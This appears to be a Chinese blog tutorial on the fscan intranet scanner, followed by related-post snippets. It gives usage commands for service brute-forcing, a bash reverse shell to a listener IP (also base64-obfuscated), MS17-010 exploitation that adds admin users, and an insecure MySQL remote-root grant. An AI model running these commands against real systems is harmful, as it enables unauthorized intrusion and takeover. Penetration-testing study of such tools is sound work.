内网扫描器Fscan

简介

  • 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
  • 支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
下载地址:https://github.com/shadow1ng/fscan

主要功能

1.信息搜集

  • 存活探测(icmp)
  • 端口扫描

2.爆破功能:

  • 各类服务爆破(ssh、smb、rdp等)
  • 数据库密码爆破(mysql、mssql、redis、psql、oracle等)

3.系统信息、漏洞扫描

  • netbios探测、域控识别
  • 获取目标网卡信息
  • 高危漏洞扫描(ms17010等)

4.Web探测功能:

  • webtitle探测
  • web指纹识别(常见cms、oa框架等)
  • web漏洞扫描(weblogic、st2等,支持xray的poc)

5.漏洞利用:

  • redis写公钥或写计划任务
  • ssh命令执行
  • ms17017利用(植入shellcode),如添加用户等

6.其他功能:

  • 文件保存

使用方法

完整参数

-c string      #ssh命令执行  
-cookie string  #设置cookie  
-debug int     #多久没响应,就打印当前进度(default 60)  
-domain string    #smb爆破模块时,设置域名  
-h string          #目标ip: 192.168.11.11 | 192.168.11.11-255 |192.168.11.11,192.168.11.12  
-hf string        #读取文件中的目标  
-hn string        #扫描时,要跳过的ip: -hn 192.168.1.1/24  -m string         #设置扫描模式: 
-m ssh (default "all")  
-no            #扫描结果不保存到文件中  
-nobr            #跳过sql、ftp、ssh等的密码爆破  
-nopoc          #跳过web poc扫描  
-np            #跳过存活探测  
-num int         #web poc 发包速率  (default 20)  
-o string          #扫描结果保存到哪 (default "result.txt") 
-p string          #设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")  
-pa string        #新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)  
-path string      #fcgi、smb romote file path  
-ping            #使用ping代替icmp进行存活探测  
-pn string        #扫描时要跳过的端口,as: -pn 445  
-pocname string   #指定web poc的模糊名字, -pocname weblogic 
-proxy string     #设置代理, -proxy http://127.0.0.1:8080  
-user string      #指定爆破时的用户名  
-userf string     #指定爆破时的用户名文件  
-pwd string       #指定爆破时的密码  
-pwdf string      # 指定爆破时的密码文件  
-rf string        #指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)  
-rs string         #redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)  
-silent          #静默扫描,适合cs扫描时不回显  
-sshkey string    #ssh连接时,指定ssh私钥  
-t int          #扫描线程 (default 600)  
-time int          #端口扫描超时时间 (default 3)  
-u string          #指定Url扫描  
-uf string        #指定Url文件扫描  
-wt int          #web访问超时时间 (default 5)  
-pocpath string  #指定poc路径  
-usera string   #在原有用户字典基础上,新增新用户  
-pwda string    #在原有密码字典基础上,增加新密码  
-socks5       #指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)  
-sc         #指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)

简单使用

fscan.exe -h [IP] #默认使用全部模块fscan.exe -h 192.168.1.1/16 #扫描B段fscan.exe -h 192.168.x.x -h 192.168.1.1/24 //C段fscan.exe -h 192.168.x.x -h 192.168.1.1/16 //B段fscan.exe -h 192.168.x.x -h 192.168.1.1/8  //A段的192.x.x.1和192.x.x.254,方便快速查看网段信息

在这里插入图片描述

加上netbios模块才会显示netbios的信息

 .\fscan64.exe -h 192.168.88.141 -m netbios

以文件进行导入扫描

.\fscan64.exe -hf “路径”
.\fscan64.exe -hf .\ip.txt
\#可以使用相对位置,也可以使用绝对位置

跳过相应IP进行扫描

.\fscan64.exe -h 192.168.88.1/24

对url进行扫描

.\fscan64.exe -u http://baidu.com
# -uf 对指定文件内的URL进行扫描

设置代理扫描

.\fscan64.exe -h 192.168.88.1/24  -proxy http://127.0.0.1:8080

爆破功能

爆破使用

爆破功能简单使用的话直接使用即可默认调用,输入如下命令它会自动爆破扫描出来的服务

 .\fscan64.exe -h IP

对模块进行自定义文件爆破

.\fscan64.exe -h [IP] -m [模块] -p [模块对应的端口] -pwdf [密码文件] -userf [用户名文件]

-m的模块包含:

  • [mssql] [ms17010] [all] [portscan] [ftp] [smb] [netbios] [oracle] [redis]
  • [fcgi] [mem] [web] [ssh] [findnet] [icmp] [main] [rdp] [mgo] [cve20200796]
  • [webonly] [mysql] [psql]

对ssh模块进行爆破,并设置自定义文件爆破:

.\fscan64.exe -h IP -m ssh -p 22 -pwdf .\pwd.txt -userf .\users.txt

-pwdf 、-userf 同样也是相对位置和绝对位置都可以使用。

注:在进行爆破的时候是按文件里面的顺序进行爆破的,这时ssh包含多个用户,只能爆破出来第一个,要把root类的管理权限高的用户名放在文本得最上面。

附加一个扫mysql服务的:

 .\fscan64.exe -h IP -m mysql -np -nopoc

在这里插入图片描述

使用navicat连接

连接的前提:你目标机要开启远程连接,

mysql开启远程连接:

grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;		#开启一个远程连接用户为root任意IP可以连接,密码时123456
flush privileges;	#刷新用户权限
select user,host from user;		#查看用户检查是否已经更改

跳过一些扫描进行爆破

-nobr 		#跳过sql、ftp、ssh等爆破
-nopoc 		#跳过web poc扫描
-np 		#跳过存活检测

漏洞利用功能

使用ssh命令执行

.\fscan64.exe -h [目标IP] -c [执行的命令]

例如:

查看用户:

 .\fscan64.exe -h IP -c whoami

ssh命令执行上线Necat

例如:

执行的命令:

bash -i >& /dev/tcp/192.168.0.120/5555 0>&1

编码后执行的命令(因为在powershell中执行的命令不能包含&&和&):

.\fscan64.exe -h 192.168.88.130  -c "bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTIwLzU1NTUgMD4mMQo=}|{base64,-d}|{bash,-i}'"

注:若命令有变只需要将变化后执行的命令进行base64编码后,对上述编码后执行的命令中的base64编码进行替换即可。

MS17-010模块利用

添加用户:

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc add

执行此命令后会生成一个用户,用户名:sysadmin 密码:1qaz@WSX!@#4

启用guest用户,并把guest用户添加到管理员组

.\fscan64.exe -h 192.168.88.141 -m ms17010 -sc guest
#启用后用户是guest 密码:1qaz@WSX!@#4
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
#网络资产信息扫描 在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
### 回答1: 内网IP扫描工具是一种用于扫描并识别内部网络中各个设备的工具。通常情况下,内网中的设备会被分配一个内部IP地址,以便在同一网络中进行通信。 CSDN(CSDN Internal IP Scanner)是一款功能强大的内网IP扫描工具,主要用于网络管理员或渗透测试人员进行内部网络安全评估和漏洞扫描。CSDN具有以下特点和功能: 1. 网段扫描:CSDN能够通过设置起始和结束的IP地址,扫描指定网络范围内的全部设备。管理员可以自定义扫描的IP范围,包括局域网中的所有主机。 2. 设备识别:CSDN能够探测并识别网络中的各类设备,如计算机、服务器、打印机、路由器等。它能够提供设备的基本信息,如IP地址、MAC地址、设备类型等,以便网络管理员了解网络拓扑结构。 3. 漏洞扫描:CSDN集成了多种漏洞扫描模块,能够自动检测和识别网络中存在的漏洞。它会对设备进行全面的扫描,包括开放端口、漏洞程序、弱口令等,以便管理员及时发现和修复潜在的安全威胁。 4. 安全提醒:CSDN提供实时的报告和告警机制,及时向管理员提供网络中发现的漏洞和安全隐患。管理员可以通过邮件、短信等方式接收到相关的警报,以便及时采取措施避免被攻击。 总而言之,CSDN是一款功能强大的内网IP扫描工具,能够帮助网络管理员或渗透测试人员全面了解内部网络的安全情况,并及时发现和修复潜在的漏洞和威胁。 ### 回答2: 内网IP扫描工具是一种用于扫描和识别内网中的设备的软件工具。它通过发送探测包到指定IP地址范围内的主机,并分析主机的响应来确定目标主机是否可用、开放的端口及其对应的服务等信息。 内网IP扫描工具通常被用于网络管理、安全审计等场景中。它能够帮助管理员发现内网中的未经授权的设备,识别潜在的安全风险,及时采取措施加强网络安全。同时,它也可以用于设备管理,帮助管理员跟踪控制内网设备的信息和状态。 常见的内网IP扫描工具有Nmap、Angry IP Scanner、OpenVAS等。这些工具通常提供了丰富的功能和高度可定制化的选项,使得管理员能够根据自身需求进行扫描操作。比如可以选择扫描目标的IP地址范围,指定探测包的类型和参数,设置扫描的时间间隔等。 然而,需要注意的是,内网IP扫描工具在使用时需遵循法律法规和道德规范,不能违反他人的隐私权和网络安全。因此,在使用这些工具时必须取得合法的授权,并且严格遵守相关的规定和约束。此外,随着网络安全形势的不断变化,内网IP扫描工具的功能和性能也不断更新和改进,因此,使用者需要持续关注新版本和安全补丁,以保持工具的有效性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Y.lin

别急,好运都藏在努力里~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值